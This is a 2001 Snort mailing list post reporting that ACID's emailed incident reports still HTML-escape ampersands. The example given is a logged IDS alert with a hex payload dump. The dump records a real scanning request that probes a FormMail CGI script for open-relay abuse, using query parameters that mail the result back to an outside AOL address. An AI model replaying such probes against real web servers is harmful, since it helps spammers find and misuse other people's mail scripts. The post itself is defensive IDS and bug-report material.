Snort mailing list archives

ACID Incident Report escapes emails


From: "Michael Scheidell" <scheidell () fdma com>
Date: Mon, 22 Oct 2001 11:48:48 -0400

On the ACID display screen, it has to 'escape' the ampersand so that it
can be displayed correctly on the HTML browser.

However, when it emails a 'full report' it still escapes the ampersand,
making the ASCII data a little difficult to read.

Example:

The data is this&that

The HTML script HAS to do: this&amp;that so that this&that is displayed on
screen; however, when the email is sent via ACID, it should not escape
the ampersand:


(And, yes, this was some luser at aldelpha searching for open web form mail
scripts, using it to send it back to itself at AOL to collect holes to spam
from.)

Michael Scheidell

--
#(5 - 42754) [2001-10-22 04:35:57] [Bugtraq/1187] [CVE/CVE-1999-0172]
[arachNIDS/226]  WEB-CGI formmail access
IPv4: 24.51.65.183 -> xx.xx.xx.xxxx
      hlen=5 TOS=0 dlen=478 ID=50070 flags=0 offset=0 TTL=113 chksum=57049
TCP:  port=21039 -> dport: 80  flags=***AP*** seq=4199629098
      ack=3611075816 off=5 res=0 win=17520 urp=0 chksum=53227
Payload:  length = 438

000 : 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F 72   GET /cgi-bin/for
010 : 6D 6D 61 69 6C 2E 70 6C 3F 65 6D 61 69 6C 3D 63   mmail.pl?email=c
020 : 78 74 31 34 40 6D 6B 65 34 31 2E 63 6F 6D 26 72   xt14 () mke41 com&amp;r
030 : 65 63 69 70 69 65 6E 74 3D 70 77 73 38 38 38 40   ecipient=pws888@
040 : 61 6F 6C 2E 63 6F 6D 26 73 75 62 6A 65 63 74 3D   aol.com&amp;subject=
050 : 68 74 74 70 3A 2F 2F 63 75 72 61 67 65 6E 2E 63   http://xxxxxxx.c
060 : 6F 6D 2F 63 67 69 2D 62 69 6E 2F 66 6F 72 6D 6D   om/cgi-bin/formm
070 : 61 69 6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25   ail.pl%20%20%20%
080 : 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32   20%20%20%20%20%2
090 : 30 25 32 30 35 39 6C 6F 35 39 26 3D 25 30 44 25   0%2059lo59&amp;=%0D%
0a0 : 30 41 25 30 44 25 30 41 74 69 6D 65 2F 64 61 74   0A%0D%0Atime/dat
0b0 : 65 3A 25 32 30 30 34 3A 33 39 3A 33 36 61 6D 25   e:%2004:39:36am%
0c0 : 32 30 2F 25 32 30 31 30 2F 32 32 2F 32 30 30 31   20/%2010/22/2001
0d0 : 25 30 44 25 30 41 3C 41 25 32 30 48 52 45 46 25   %0D%0A&lt;A%20HREF%
0e0 : 33 44 25 32 32 68 74 74 70 3A 2F 2F 63 75 72 61   3D%22http://xxxx
0f0 : 67 65 6E 2E 63 6F 6D 2F 63 67 69 2D 62 69 6E 2F   xxx.com/cgi-bin/
100 : 66 6F 72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 68   formmail.pl%22&gt;h
110 : 74 74 70 3A 2F 2F 63 75 72 61 67 65 6E 2E 63 6F   ttp://xxxxxxx.co
120 : 6D 2F 63 67 69 2D 62 69 6E 2F 66 6F 72 6D 6D 61   m/cgi-bin/formma
130 : 69 6C 2E 70 6C 3C 2F 41 3E 25 30 44 25 30 41 25   il.pl&lt;/A&gt;%0D%0A%
140 : 30 44 25 30 41 35 39 6C 6F 35 39 25 32 30 7E 76   0D%0A59lo59%20~v
150 : 6D 73 20 48 54 54 50 2F 31 2E 30 0D 0A 43 61 63   ms HTTP/1.0..Cac
160 : 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 4E 6F 2D 43   he-Control: No-C
170 : 61 63 68 65 0D 0A 50 72 6F 78 79 2D 43 6F 6E 6E   ache..Proxy-Conn
180 : 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69   ection: Keep-Ali
190 : 76 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D   ve..Accept: */*.
1a0 : 0A 48 4F 53 54 3A 20 63 75 72 61 67 65 6E 2E 63   .HOST: xxxxxxx.c
1b0 : 6F 6D 0D 0A 0D 0A                                 om....


